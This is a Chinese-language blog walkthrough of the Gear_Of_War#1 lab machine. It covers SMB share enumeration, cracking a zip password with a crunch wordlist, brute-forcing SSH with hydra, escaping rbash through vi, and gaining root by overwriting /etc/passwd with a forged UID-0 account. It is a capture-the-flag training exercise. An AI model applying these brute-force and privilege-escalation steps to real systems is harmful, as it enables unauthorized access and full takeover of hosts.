美文网首页
Gear_Of_War#1靶机渗透实战

Gear_Of_War#1靶机渗透实战

作者: 城市烈人 | 来源:发表于2019-11-27 19:24 被阅读0次

Gear_Of_War#1靶机渗透实战

image.png

1、信息收集

image.png

先探测smb服务

enum4linux -S 192.168.56.101
image.png

发现靶机开启了该共享 //192.168.56.101/LOCUS_LAN$

smbclient连接进入

smbclient --user=share //192.168.56.101/LOCUS_LAN$
image.png

发现两个可疑文件,直接down下来

查看SOS

image.png

目标--寻找该密码文件,很明显就是该压缩包文件

image.png

当前暂时无法获取到解压密码,按照提示,密码应该是包含着一个文件file中

进行web端信息收集,点击Join the War后进入另一张图片,直接右键源码查看

image.png

找到了第一个flag:KESXO5BAONYCUID6OUQHI7DUEN3HI7LSFJISAQCDEBITAY2RBI======

并得到一堆乱码的东西

image.png

开始扫下目录,robots下提示四个路径

/marcus.html
/dom.html
/cole.html
/baird.html
/acarmine.html
image.png

每个路径都是一张图,右键源码后,每个图都由一个注释信息

2、字典生成

通过google了解到,原来[@%%,]在密码学中具有特殊含义

@ 代表小写字母
% 代表数字
, 代表大写字母
^ 代表特殊符号

因此我们判断出该密码应该是有四位字符组成[小写字母、数字、数字、大写字母]

所有进行crunch字典生成

crunch 4 4 -o passwd -t @%%,

参数解释

-t 指定密码生成格式
image.png image.png

3、爆破

通过上述的字典对压缩hash进行爆破

fcrackzip -D -p passwd -u msg_horda.zip
image.png

破解成功,密码为 r44M

立刻解压得到key.txt

image.png
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."

[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]

-General RAAM.

继续看不懂

但 3_d4y 很像是密码,因此按照上述思路,根据端口扫描后,靶机开放了22的ssh端口,不妨再次爆破

根据上述的信息收集,将所有搜集到的人名写入用户名字典中

Delta Team
Hoffman
Vamos
General RAAM
marcus
dom
cole
baird
acarmine

直接上hydra爆破

hydra -L ssh-passwd -p 3_d4y ssh://192.168.56.101
image.png

爆破成功,口令为:login: marcus password: 3_d4y

直接登录ssh

image.png

随意几个命令就能发现,又是一个rbash的shell

image.png

系统又是挺新的,无法提权

4、rbash逃逸

进入vi,指令模式,设置系统变量

set shell=/bin/sh
shell
image.png

逃逸成功

5、提权

查看下可执行的命令后者二进制文件

find / -perm -4000 2> /dev/null
image.png

当前的环境下可以执行cp和su、sudo权限,即可进行伪造、覆盖passwd文件进行su提权

生成一个伪造的hacker用户,指定root权限,写入到passwd中进行提权

openssl passwd -1 -salt hack hack
image.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash

cp复制到/etc/目录下,直接覆盖

su hack
image.png

提权成功

在root目录下,直接cat .flag.txt 即可

image.png

6、总结

该靶机的难点在于:

1、收集到密码特殊字符分别是@ 代表小写字母,% 代表数字,, 代表大写字母,^ 代表特殊符号

通过特殊字符的含义,生成指定的密码进行爆破

2、rbash逃逸、提权

相关文章

  • Gear_Of_War#1靶机渗透实战

    Gear_Of_War#1靶机渗透实战 1、信息收集 先探测smb服务 发现靶机开启了该共享 //192.168....

  • BTRsys-2渗透实战

    BTRsys-2靶机渗透实战 靶机IP:192.168.8.134 信息收集 nmap全端口扫 共有三个服务: w...

  • sunset靶机渗透实战

    sunset靶机渗透,该靶机就是纯主机渗透,比较简单,适合新手练习本垃圾现在转向工控安全领域继续学习,后续将推出团...

  • Born2rootv2渗透实战

    Born2rootv2渗透实战 靶机IP:192.168.56.105 nmap全端口扫 web渗透 直接跑一遍目...

  • Bob_v1.0.1渗透实战

    Bob_v1.0.1渗透实战 该靶机有意思的是如何绕过webshell命令执行,进而反弹shell后;在靶机中信息...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • 渗透靶机

    1.metasploitable-linux-2.0 https://excellmedia.dl.sourcef...

  • MinUv2靶机渗透实战

    这篇在安全客投稿失败,就发布在简书上吧以后大家可以在安全客上关注我:hack-shark 靶机IP发现 靶机发现,...

  • 渗透测试实战——prime靶机入侵

    Ip:192.168.0.115 Kali:192.168.0.21 安装好的靶机界面 【注:Nmap是一个网络连...

  • covfefe渗透实战

    该渗透实战利用了私钥登录ssh,解密私钥、堆栈溢出提权等操作,算是对基本功操作进行巩固吧。。。靶机IP:192.1...

网友评论

      本文标题:Gear_Of_War#1靶机渗透实战

      本文链接:https://www.haomeiwen.com/subject/znrmwctx.html